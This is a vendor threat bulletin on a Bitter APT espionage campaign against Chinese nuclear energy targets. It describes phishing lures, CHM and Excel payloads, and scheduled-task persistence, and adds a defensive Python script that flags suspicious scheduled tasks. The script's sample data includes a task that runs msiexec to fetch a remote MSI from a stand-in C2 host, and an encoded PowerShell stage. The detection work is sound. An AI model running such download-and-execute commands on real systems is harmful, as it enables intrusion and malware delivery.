The PolySwarm Blog


Bitter APT Campaign Targets Energy Sector

Apr 10, 2023 1:22:19 PM / by The Hivemind

Verticals Targeted: Energy

Executive Summary

A recent Bitter APT campaign targeted nuclear energy entities in China. The threat actors used multiple techniques to obtain access to the victim machine, maintain persistence, and download and execute next-stage payloads.

Key Takeaways

  • Bitter APT recently launched an espionage campaign targeting energy sector entities in China.
  • The threat actors used a phishing lure masquerading as a conference invitation from an embassy attaché.
  • The threat actors used both CHM and Excel payloads and employed multiple techniques in an attempt to evade detection and analysis.

The Campaign

Intezer recently reported on a Bitter APT campaign targeting nuclear energy entities in China. The threat actors engaged targets with phishing emails whose lures purported to come from the Embassy of Kyrgyzstan in Beijing and invited the recipient to a conference in their field. Each email carried a RAR archive containing a CHM or Excel payload, and the pretext was designed to entice the recipient into opening it. To lend the email legitimacy, the threat actors used the name of an actual attaché at the embassy.

In the campaign, the threat actors used multiple malicious payloads, which were compressed into RAR files. The payloads are intended to maintain persistence in the victim network and download additional malware payloads.

The Excel payloads use an Equation Editor exploit to create two scheduled tasks: one downloads the next-stage payload and the other attempts to execute the newly downloaded payload.

The CHM files (Microsoft Compiled HTML Help) are used to execute arbitrary code and to create scheduled tasks, giving the threat actor persistence on the victim machine with very little user interaction required to initiate the infection. Because CHM files are LZX-compressed, their contents evade static malware analysis unless the file is first decompressed. One version of the CHM file creates a scheduled task that uses msiexec, a living-off-the-land binary (LOLBin), to execute a remote MSI payload hosted on the C2. Another version of the CHM payload performs similar activity through an encoded PowerShell command stage.
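
The two persistence actions described above (a scheduled task whose action is msiexec fetching a remote MSI, or an encoded PowerShell stage) can be hunted for in task-creation telemetry. The Python below is an added example, not code from the Intezer report or from PolySwarm; the Windows Security event 4698 TaskContent shape is real, but the task names, the example.invalid URL and the encoded command are constructed.

```python
import base64
import re
import xml.etree.ElementTree as ET

# Constructed samples shaped like the TaskContent XML of a Windows Security
# event 4698 (scheduled task created). Not real telemetry; names are invented.
TASK_NS = "http://schemas.microsoft.com/windows/2004/02/mit/task"

def task_xml(command, arguments):
    return (f'<Task xmlns="{TASK_NS}"><Actions><Exec><Command>{command}</Command>'
            f'<Arguments>{arguments}</Arguments></Exec></Actions></Task>')

# -EncodedCommand takes base64 of the UTF-16LE script text.
ENCODED = base64.b64encode("Write-Host constructed-sample".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"TaskName": r"\Vendor\Updater", "TaskContent": task_xml(r"C:\Program Files\Vendor\updater.exe", "/silent")},
    {"TaskName": r"\Office\Sync", "TaskContent": task_xml("msiexec.exe", "/i https://c2.example.invalid/stage2.msi /q")},
    {"TaskName": r"\LocalInstall", "TaskContent": task_xml("msiexec.exe", r"/i C:\Temp\app.msi /qn")},
    {"TaskName": r"\Update", "TaskContent": task_xml("powershell.exe", f"-nop -w hidden -enc {ENCODED}")},
]

URL_RE = re.compile(r"https?://\S+", re.I)
# -EncodedCommand and the abbreviations PowerShell accepts for it (-e, -ec, -en, -enc).
ENC_FLAG_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+(\S+)", re.I)

def exec_actions(task_content):
    """Yield (command, arguments) for each <Exec> action, ignoring the XML namespace."""
    for el in ET.fromstring(task_content).iter():
        if el.tag.rsplit("}", 1)[-1] == "Exec":
            fields = {c.tag.rsplit("}", 1)[-1]: (c.text or "") for c in el}
            yield fields.get("Command", ""), fields.get("Arguments", "")

def triage_task(event):
    """Findings for one event: msiexec pulling a remote MSI, or an encoded PowerShell stage."""
    findings = []
    for command, args in exec_actions(event["TaskContent"]):
        exe = command.replace("/", "\\").rsplit("\\", 1)[-1].lower()
        url = URL_RE.search(args)
        if exe == "msiexec.exe" and url:  # local MSI installs (no URL) are not flagged
            findings.append(f"{event['TaskName']}: msiexec installing remote MSI from {url.group(0)}")
        enc = ENC_FLAG_RE.search(args) if exe in ("powershell.exe", "pwsh.exe") else None
        if enc:
            try:  # decode the stage so the analyst sees the script text, not a blob
                decoded = base64.b64decode(enc.group(1), validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                decoded = "<undecodable>"
            findings.append(f"{event['TaskName']}: encoded PowerShell stage -> {decoded!r}")
    return findings
```

Running `triage_task` over each of the constructed events flags only the remote msiexec task and the encoded PowerShell task; the vendor updater and the local MSI install produce no findings.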

Who is Bitter APT?

Bitter APT is a threat actor group thought to operate out of South Asia. The group primarily engages in espionage campaigns. Bitter APT has previously targeted government and energy sector entities in Pakistan, China, Saudi Arabia, and Bangladesh.

PolySwarm has multiple samples associated with this campaign.

You can use the following CLI command to search for all Bitter APT samples in our portal:

$ polyswarm link list -f BitterAPT

Topics: Threat Bulletin, China, Energy, South Asia, Bitter APT, Nuclear
